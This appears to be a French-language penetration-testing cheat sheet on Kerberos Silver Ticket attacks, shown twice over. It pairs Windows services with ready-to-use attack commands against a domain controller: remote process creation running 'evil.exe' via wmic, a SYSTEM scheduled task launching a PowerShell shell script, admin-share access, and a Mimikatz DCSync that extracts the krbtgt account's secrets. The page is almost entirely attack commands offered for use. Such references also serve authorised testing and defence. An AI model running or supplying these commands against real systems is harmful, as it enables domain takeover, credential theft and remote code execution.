Silver Ticket

Service à cibler lors de demande de TGS :

Type de service

Service Silver Ticket

Attaques

SWMI

HOST + RPCSS

wmic.exe /authority:"kerberos:DOMAIN\DC01" /node:"DC01" process call create "cmd /c evil.exe"

Powershell Remoting

HTTP + WSMAN

New-PSSESSION -NAME PSC -ComputerName DC01; Enter-PSSession -Name PSC

WinRM

HTTP + WSMAN

New-PSSESSION -NAME PSC -ComputerName DC01; Enter-PSSession -Name PSC

Scheduled Tasks

HOST

schtasks /create /s dc01 /SC WEEKLY /RU "NT Authority\System" /IN "SCOM Agent Health Check" /IR "C:/shell.ps1"

Windows File Share (CIFS)

CIFS

dir \dc01\c$

LDAP operations including Mimikatz DCSync

LDAP

lsadump::dcsync /dc:dc01 /domain:domain.local /user:krbtgt

Windows Remote Server Administration Tools

RPCSS + LDAP + CIFS

PreviousGolden Ticket NextSkeleton Key

Last updated 3 years ago

Silver Ticket

Service à cibler lors de demande de TGS :

Type de service

Service Silver Ticket

Attaques

SWMI

HOST + RPCSS

wmic.exe /authority:"kerberos:DOMAIN\DC01" /node:"DC01" process call create "cmd /c evil.exe"

Powershell Remoting

HTTP + WSMAN

New-PSSESSION -NAME PSC -ComputerName DC01; Enter-PSSession -Name PSC

WinRM

HTTP + WSMAN

New-PSSESSION -NAME PSC -ComputerName DC01; Enter-PSSession -Name PSC

Scheduled Tasks

HOST

schtasks /create /s dc01 /SC WEEKLY /RU "NT Authority\System" /IN "SCOM Agent Health Check" /IR "C:/shell.ps1"

Windows File Share (CIFS)

CIFS

dir \dc01\c$

LDAP operations including Mimikatz DCSync

LDAP

lsadump::dcsync /dc:dc01 /domain:domain.local /user:krbtgt

Windows Remote Server Administration Tools

RPCSS + LDAP + CIFS

PreviousGolden Ticket NextSkeleton Key

Last updated 3 years ago